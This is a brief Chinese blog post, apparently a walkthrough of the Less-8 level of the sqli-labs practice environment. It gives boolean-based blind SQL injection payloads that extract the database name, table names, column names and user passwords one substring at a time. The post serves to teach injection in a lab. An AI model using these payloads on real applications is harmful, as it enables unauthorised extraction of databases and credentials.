Less8跟之前的Less5,Less6一样,也可以用布尔型注入来做,我们简单的测试就可以知道闭合方式也是’,所以关于原理部分就不写了,有疑惑的可以直接看我前面的博客,下面直接给出具体payload。
报数据库名
?id=1' and substr(database(),1,1)="s" --+
报表名
?id=1' and substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,6)="emails" --+
报列名
?id=1' and substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,2)="id" --+
报数据
?id=1' and substr((select password from users limit 0,1),1,4) ="dumb" --+